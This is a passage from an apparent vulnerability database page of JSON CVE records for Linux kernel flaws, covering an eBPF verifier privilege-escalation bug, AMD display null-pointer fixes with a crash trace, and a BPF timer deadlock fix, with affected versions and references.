kernel/bpf/verifier.c in the Linux kernel through 5.15.14 allows local users to gain privileges because of the availability of pointer arithmetic via certain *_OR_NULL pointer types.
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T03:36:20.302Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.openwall.com/lists/oss-security/2022/01/13/1"
},
{
"name": "[oss-security] 20220114 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2022/01/14/1"
},
{
"name": "[oss-security] 20220118 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2022/01/18/2"
},
{
"name": "DSA-5050",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5050"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20220217-0002/"
},
{
"name": "FEDORA-2022-952bb7b856",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCR3LIRUEXR7CA63W5M2HT3K63MZGKBR/"
},
{
"name": "FEDORA-2022-edbd74424e",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z5VTIZZUPC73IEJNZX66BY2YCBRZAELB/"
},
{
"name": "[oss-security] 20220601 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2022/06/01/1"
},
{
"name": "[oss-security] 20220604 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2022/06/04/3"
},
{
"name": "[oss-security] 20220607 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2022/06/07/3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=64620e0a1e712a778095bd35cbb277dc2259281f"
},
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1194765"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "kernel/bpf/verifier.c in the Linux kernel through 5.15.14 allows local users to gain privileges because of the availability of pointer arithmetic via certain *_OR_NULL pointer types."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-03-25T00:10:53.963364",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.openwall.com/lists/oss-security/2022/01/13/1"
},
{
"name": "[oss-security] 20220114 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2022/01/14/1"
},
{
"name": "[oss-security] 20220118 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2022/01/18/2"
},
{
"name": "DSA-5050",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5050"
},
{
"url": "https://security.netapp.com/advisory/ntap-20220217-0002/"
},
{
"name": "FEDORA-2022-952bb7b856",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCR3LIRUEXR7CA63W5M2HT3K63MZGKBR/"
},
{
"name": "FEDORA-2022-edbd74424e",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z5VTIZZUPC73IEJNZX66BY2YCBRZAELB/"
},
{
"name": "[oss-security] 20220601 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2022/06/01/1"
},
{
"name": "[oss-security] 20220604 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2022/06/04/3"
},
{
"name": "[oss-security] 20220607 Re: Linux Kernel eBPF Improper Input Validation Vulnerability",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2022/06/07/3"
},
{
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=64620e0a1e712a778095bd35cbb277dc2259281f"
},
{
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1194765"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-23222",
"datePublished": "2022-01-14T00:00:00",
"dateReserved": "2022-01-14T00:00:00",
"dateUpdated": "2024-08-03T03:36:20.302Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43904 (GCVE-0-2024-43904)
Vulnerability from cvelistv5
Published
2024-08-26 10:11
Modified
2025-07-11 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Add null checks for 'stream' and 'plane' before dereferencing
This commit adds null checks for the 'stream' and 'plane' variables in
the dcn30_apply_idle_power_optimizations function. These variables were
previously assumed to be null at line 922, but they were used later in
the code without checking if they were null. This could potentially lead
to a null pointer dereference, which would cause a crash.
The null checks ensure that 'stream' and 'plane' are not null before
they are used, preventing potential crashes.
Fixes the below static smatch checker:
drivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn30/dcn30_hwseq.c:938 dcn30_apply_idle_power_optimizations() error: we previously assumed 'stream' could be null (see line 922)
drivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn30/dcn30_hwseq.c:940 dcn30_apply_idle_power_optimizations() error: we previously assumed 'plane' could be null (see line 922)
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43904",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:40.587220Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:57.036Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/hwss/dcn30/dcn30_hwseq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fcf9d6a9f30ea414b6b84a6e901cebd44e146847",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "5e84eda48ffb2363437db44bbd0235594f8a58f9",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "10c20d79d59cadfe572480d98cec271a89ffb024",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "16a8a2a839d19c4cf7253642b493ffb8eee1d857",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "15c2990e0f0108b9c3752d7072a97d45d4283aea",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/hwss/dcn30/dcn30_hwseq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.181",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.116",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.60",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.181",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.116",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.60",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Add null checks for \u0027stream\u0027 and \u0027plane\u0027 before dereferencing\n\nThis commit adds null checks for the \u0027stream\u0027 and \u0027plane\u0027 variables in\nthe dcn30_apply_idle_power_optimizations function. These variables were\npreviously assumed to be null at line 922, but they were used later in\nthe code without checking if they were null. This could potentially lead\nto a null pointer dereference, which would cause a crash.\n\nThe null checks ensure that \u0027stream\u0027 and \u0027plane\u0027 are not null before\nthey are used, preventing potential crashes.\n\nFixes the below static smatch checker:\ndrivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn30/dcn30_hwseq.c:938 dcn30_apply_idle_power_optimizations() error: we previously assumed \u0027stream\u0027 could be null (see line 922)\ndrivers/gpu/drm/amd/amdgpu/../display/dc/hwss/dcn30/dcn30_hwseq.c:940 dcn30_apply_idle_power_optimizations() error: we previously assumed \u0027plane\u0027 could be null (see line 922)"
}
],
"providerMetadata": {
"dateUpdated": "2025-07-11T17:20:09.883Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fcf9d6a9f30ea414b6b84a6e901cebd44e146847"
},
{
"url": "https://git.kernel.org/stable/c/5e84eda48ffb2363437db44bbd0235594f8a58f9"
},
{
"url": "https://git.kernel.org/stable/c/10c20d79d59cadfe572480d98cec271a89ffb024"
},
{
"url": "https://git.kernel.org/stable/c/16a8a2a839d19c4cf7253642b493ffb8eee1d857"
},
{
"url": "https://git.kernel.org/stable/c/15c2990e0f0108b9c3752d7072a97d45d4283aea"
}
],
"title": "drm/amd/display: Add null checks for \u0027stream\u0027 and \u0027plane\u0027 before dereferencing",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43904",
"datePublished": "2024-08-26T10:11:05.029Z",
"dateReserved": "2024-08-17T09:11:59.292Z",
"dateUpdated": "2025-07-11T17:20:09.883Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43899 (GCVE-0-2024-43899)
Vulnerability from cvelistv5
Published
2024-08-26 10:10
Modified
2025-07-11 17:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix null pointer deref in dcn20_resource.c
Fixes a hang thats triggered when MPV is run on a DCN401 dGPU:
mpv --hwdec=vaapi --vo=gpu --hwdec-codecs=all
and then enabling fullscreen playback (double click on the video)
The following calltrace will be seen:
[ 181.843989] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 181.843997] #PF: supervisor instruction fetch in kernel mode
[ 181.844003] #PF: error_code(0x0010) - not-present page
[ 181.844009] PGD 0 P4D 0
[ 181.844020] Oops: 0010 [#1] PREEMPT SMP NOPTI
[ 181.844028] CPU: 6 PID: 1892 Comm: gnome-shell Tainted: G W OE 6.5.0-41-generic #41~22.04.2-Ubuntu
[ 181.844038] Hardware name: System manufacturer System Product Name/CROSSHAIR VI HERO, BIOS 6302 10/23/2018
[ 181.844044] RIP: 0010:0x0
[ 181.844079] Code: Unable to access opcode bytes at 0xffffffffffffffd6.
[ 181.844084] RSP: 0018:ffffb593c2b8f7b0 EFLAGS: 00010246
[ 181.844093] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000004
[ 181.844099] RDX: ffffb593c2b8f804 RSI: ffffb593c2b8f7e0 RDI: ffff9e3c8e758400
[ 181.844105] RBP: ffffb593c2b8f7b8 R08: ffffb593c2b8f9c8 R09: ffffb593c2b8f96c
[ 181.844110] R10: 0000000000000000 R11: 0000000000000000 R12: ffffb593c2b8f9c8
[ 181.844115] R13: 0000000000000001 R14: ffff9e3c88000000 R15: 0000000000000005
[ 181.844121] FS: 00007c6e323bb5c0(0000) GS:ffff9e3f85f80000(0000) knlGS:0000000000000000
[ 181.844128] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 181.844134] CR2: ffffffffffffffd6 CR3: 0000000140fbe000 CR4: 00000000003506e0
[ 181.844141] Call Trace:
[ 181.844146] <TASK>
[ 181.844153] ? show_regs+0x6d/0x80
[ 181.844167] ? __die+0x24/0x80
[ 181.844179] ? page_fault_oops+0x99/0x1b0
[ 181.844192] ? do_user_addr_fault+0x31d/0x6b0
[ 181.844204] ? exc_page_fault+0x83/0x1b0
[ 181.844216] ? asm_exc_page_fault+0x27/0x30
[ 181.844237] dcn20_get_dcc_compression_cap+0x23/0x30 [amdgpu]
[ 181.845115] amdgpu_dm_plane_validate_dcc.constprop.0+0xe5/0x180 [amdgpu]
[ 181.845985] amdgpu_dm_plane_fill_plane_buffer_attributes+0x300/0x580 [amdgpu]
[ 181.846848] fill_dc_plane_info_and_addr+0x258/0x350 [amdgpu]
[ 181.847734] fill_dc_plane_attributes+0x162/0x350 [amdgpu]
[ 181.848748] dm_update_plane_state.constprop.0+0x4e3/0x6b0 [amdgpu]
[ 181.849791] ? dm_update_plane_state.constprop.0+0x4e3/0x6b0 [amdgpu]
[ 181.850840] amdgpu_dm_atomic_check+0xdfe/0x1760 [amdgpu]
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43899",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:56.399311Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:08.100Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/resource/dcn20/dcn20_resource.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "974fccd61758599a9716c4b909d9226749efe37e",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "ecbf60782662f0a388493685b85a645a0ba1613c",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/resource/dcn20/dcn20_resource.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix null pointer deref in dcn20_resource.c\n\nFixes a hang thats triggered when MPV is run on a DCN401 dGPU:\n\nmpv --hwdec=vaapi --vo=gpu --hwdec-codecs=all\n\nand then enabling fullscreen playback (double click on the video)\n\nThe following calltrace will be seen:\n\n[ 181.843989] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 181.843997] #PF: supervisor instruction fetch in kernel mode\n[ 181.844003] #PF: error_code(0x0010) - not-present page\n[ 181.844009] PGD 0 P4D 0\n[ 181.844020] Oops: 0010 [#1] PREEMPT SMP NOPTI\n[ 181.844028] CPU: 6 PID: 1892 Comm: gnome-shell Tainted: G W OE 6.5.0-41-generic #41~22.04.2-Ubuntu\n[ 181.844038] Hardware name: System manufacturer System Product Name/CROSSHAIR VI HERO, BIOS 6302 10/23/2018\n[ 181.844044] RIP: 0010:0x0\n[ 181.844079] Code: Unable to access opcode bytes at 0xffffffffffffffd6.\n[ 181.844084] RSP: 0018:ffffb593c2b8f7b0 EFLAGS: 00010246\n[ 181.844093] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000004\n[ 181.844099] RDX: ffffb593c2b8f804 RSI: ffffb593c2b8f7e0 RDI: ffff9e3c8e758400\n[ 181.844105] RBP: ffffb593c2b8f7b8 R08: ffffb593c2b8f9c8 R09: ffffb593c2b8f96c\n[ 181.844110] R10: 0000000000000000 R11: 0000000000000000 R12: ffffb593c2b8f9c8\n[ 181.844115] R13: 0000000000000001 R14: ffff9e3c88000000 R15: 0000000000000005\n[ 181.844121] FS: 00007c6e323bb5c0(0000) GS:ffff9e3f85f80000(0000) knlGS:0000000000000000\n[ 181.844128] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 181.844134] CR2: ffffffffffffffd6 CR3: 0000000140fbe000 CR4: 00000000003506e0\n[ 181.844141] Call Trace:\n[ 181.844146] \u003cTASK\u003e\n[ 181.844153] ? show_regs+0x6d/0x80\n[ 181.844167] ? __die+0x24/0x80\n[ 181.844179] ? page_fault_oops+0x99/0x1b0\n[ 181.844192] ? do_user_addr_fault+0x31d/0x6b0\n[ 181.844204] ? exc_page_fault+0x83/0x1b0\n[ 181.844216] ? asm_exc_page_fault+0x27/0x30\n[ 181.844237] dcn20_get_dcc_compression_cap+0x23/0x30 [amdgpu]\n[ 181.845115] amdgpu_dm_plane_validate_dcc.constprop.0+0xe5/0x180 [amdgpu]\n[ 181.845985] amdgpu_dm_plane_fill_plane_buffer_attributes+0x300/0x580 [amdgpu]\n[ 181.846848] fill_dc_plane_info_and_addr+0x258/0x350 [amdgpu]\n[ 181.847734] fill_dc_plane_attributes+0x162/0x350 [amdgpu]\n[ 181.848748] dm_update_plane_state.constprop.0+0x4e3/0x6b0 [amdgpu]\n[ 181.849791] ? dm_update_plane_state.constprop.0+0x4e3/0x6b0 [amdgpu]\n[ 181.850840] amdgpu_dm_atomic_check+0xdfe/0x1760 [amdgpu]"
}
],
"providerMetadata": {
"dateUpdated": "2025-07-11T17:20:06.084Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/974fccd61758599a9716c4b909d9226749efe37e"
},
{
"url": "https://git.kernel.org/stable/c/ecbf60782662f0a388493685b85a645a0ba1613c"
}
],
"title": "drm/amd/display: Fix null pointer deref in dcn20_resource.c",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43899",
"datePublished": "2024-08-26T10:10:57.083Z",
"dateReserved": "2024-08-17T09:11:59.291Z",
"dateUpdated": "2025-07-11T17:20:06.084Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42239 (GCVE-0-2024-42239)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fail bpf_timer_cancel when callback is being cancelled
Given a schedule:
timer1 cb timer2 cb
bpf_timer_cancel(timer2); bpf_timer_cancel(timer1);
Both bpf_timer_cancel calls would wait for the other callback to finish
executing, introducing a lockup.
Add an atomic_t count named 'cancelling' in bpf_hrtimer. This keeps
track of all in-flight cancellation requests for a given BPF timer.
Whenever cancelling a BPF timer, we must check if we have outstanding
cancellation requests, and if so, we must fail the operation with an
error (-EDEADLK) since cancellation is synchronous and waits for the
callback to finish executing. This implies that we can enter a deadlock
situation involving two or more timer callbacks executing in parallel
and attempting to cancel one another.
Note that we avoid incrementing the cancelling counter for the target
timer (the one being cancelled) if bpf_timer_cancel is not invoked from
a callback, to avoid spurious errors. The whole point of detecting
cur->cancelling and returning -EDEADLK is to not enter a busy wait loop
(which may or may not lead to a lockup). This does not apply in case the
caller is in a non-callback context, the other side can continue to
cancel as it sees fit without running into errors.
Background on prior attempts:
Earlier versions of this patch used a bool 'cancelling' bit and used the
following pattern under timer->lock to publish cancellation status.
lock(t->lock);
t->cancelling = true;
mb();
if (cur->cancelling)
return -EDEADLK;
unlock(t->lock);
hrtimer_cancel(t->timer);
t->cancelling = false;
The store outside the critical section could overwrite a parallel
requests t->cancelling assignment to true, to ensure the parallely
executing callback observes its cancellation status.
It would be necessary to clear this cancelling bit once hrtimer_cancel
is done, but lack of serialization introduced races. Another option was
explored where bpf_timer_start would clear the bit when (re)starting the
timer under timer->lock. This would ensure serialized access to the
cancelling bit, but may allow it to be cleared before in-flight
hrtimer_cancel has finished executing, such that lockups can occur
again.
Thus, we choose an atomic counter to keep track of all outstanding
cancellation requests and use it to prevent lockups in case callbacks
attempt to cancel each other while executing in parallel.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42239",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:13:54.505425Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:31.803Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/helpers.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9369830518688ecd5b08ffc08ab3302ce2b5d0f7",
"status": "affected",
"version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
"versionType": "git"
},
{
"lessThan": "3e4e8178a8666c56813bd167b848fca0f4c9af0a",
"status": "affected",
"version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
"versionType": "git"
},
{
"lessThan": "d4523831f07a267a943f0dde844bf8ead7495f13",
"status": "affected",
"version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/helpers.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fail bpf_timer_cancel when callback is being cancelled\n\nGiven a schedule:\n\ntimer1 cb\t\t\ttimer2 cb\n\nbpf_timer_cancel(timer2);\tbpf_timer_cancel(timer1);\n\nBoth bpf_timer_cancel calls would wait for the other callback to finish\nexecuting, introducing a lockup.\n\nAdd an atomic_t count named \u0027cancelling\u0027 in bpf_hrtimer. This keeps\ntrack of all in-flight cancellation requests for a given BPF timer.\nWhenever cancelling a BPF timer, we must check if we have outstanding\ncancellation requests, and if so, we must fail the operation with an\nerror (-EDEADLK) since cancellation is synchronous and waits for the\ncallback to finish executing. This implies that we can enter a deadlock\nsituation involving two or more timer callbacks executing in parallel\nand attempting to cancel one another.\n\nNote that we avoid incrementing the cancelling counter for the target\ntimer (the one being cancelled) if bpf_timer_cancel is not invoked from\na callback, to avoid spurious errors. The whole point of detecting\ncur-\u003ecancelling and returning -EDEADLK is to not enter a busy wait loop\n(which may or may not lead to a lockup). This does not apply in case the\ncaller is in a non-callback context, the other side can continue to\ncancel as it sees fit without running into errors.\n\nBackground on prior attempts:\n\nEarlier versions of this patch used a bool \u0027cancelling\u0027 bit and used the\nfollowing pattern under timer-\u003elock to publish cancellation status.\n\nlock(t-\u003elock);\nt-\u003ecancelling = true;\nmb();\nif (cur-\u003ecancelling)\n\treturn -EDEADLK;\nunlock(t-\u003elock);\nhrtimer_cancel(t-\u003etimer);\nt-\u003ecancelling = false;\n\nThe store outside the critical section could overwrite a parallel\nrequests t-\u003ecancelling assignment to true, to ensure the parallely\nexecuting callback observes its cancellation status.\n\nIt would be necessary to clear this cancelling bit once hrtimer_cancel\nis done, but lack of serialization introduced races. Another option was\nexplored where bpf_timer_start would clear the bit when (re)starting the\ntimer under timer-\u003elock. This would ensure serialized access to the\ncancelling bit, but may allow it to be cleared before in-flight\nhrtimer_cancel has finished executing, such that lockups can occur\nagain.\n\nThus, we choose an atomic counter to keep track of all outstanding\ncancellation requests and use it to prevent lockups in case callbacks\nattempt to cancel each other while executing in parallel."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:50.911Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9369830518688ecd5b08ffc08ab3302ce2b5d0f7"
},
{
"url": "https://git.kernel.org/stable/c/3e4e8178a8666c56813bd167b848fca0f4c9af0a"
},
{
"url": "https://git.kernel.org/stable/c/d4523831f07a267a943f0dde844bf8ead7495f13"
}
],
"title": "bpf: Fail bpf_timer_cancel when callback is being cancelled",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42239",
"datePublished": "2024-08-07T15:14:27.382Z",
"dateReserved": "2024-07-30T07:40:12.253Z",
